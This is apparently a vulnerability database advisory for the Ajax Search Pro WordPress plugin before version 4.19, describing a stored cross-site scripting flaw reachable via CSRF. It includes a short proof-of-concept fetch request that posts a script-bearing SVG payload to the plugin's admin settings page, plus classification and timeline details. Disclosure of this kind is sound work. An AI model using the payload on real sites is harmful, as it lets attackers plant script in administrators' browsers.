Ajax Search Pro < 4.19 – Stored XSS via CSRF | Plugin Vulnerabilities

Description

The plugin does not properly sanitize and escape user input before printing it back into the administration panel.

Proof of Concept

await fetch("http://vulnerable-site.tld/wp-admin/admin.php?page=asp_settings", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    "body": "addsearch=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E&submit=Add",
    "method": "POST",
    "mode": "cors"
});

Affects Plugins

ajax-search-pro

Fixed in 4.19

References

URL

https://changelog.ajaxsearchpro.com/#4.19-2020-08.03

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Submitter

Chris Grello

Verified

Yes

WPVDB ID

b00b4d66-acd3-4f5e-b1c8-b408e4b2c9dd

Timeline

Publicly Published

2020-08-03 (about 5 years ago)

Added

2023-03-30 (about 3 years ago)

Last Updated

2023-03-30 (about 3 years ago)

Other

Published

Title

Published

2023-11-14

Title

Restaurant & Cafe Addon for Elementor < 1.5.3 - Cross-Site Request Forgery

Published

2023-03-21

Title

Weather Station < 3.8.13 - Mode Switch via CSRF

Published

2025-09-05

Title

Error Monitoring by Bugsnag < 1.6.4 - Cross-Site Request Forgery

Published

2023-07-17

Title

Falang multilanguage < 1.3.40 - Cross-Site Request Forgery

Published

2025-03-03

Title

Wallet System for WooCommerce – Wallet, Wallet Cashback, Refunds, Partial Payment, Wallet Restriction < 2.6.3 - Cross-Site Request Forgery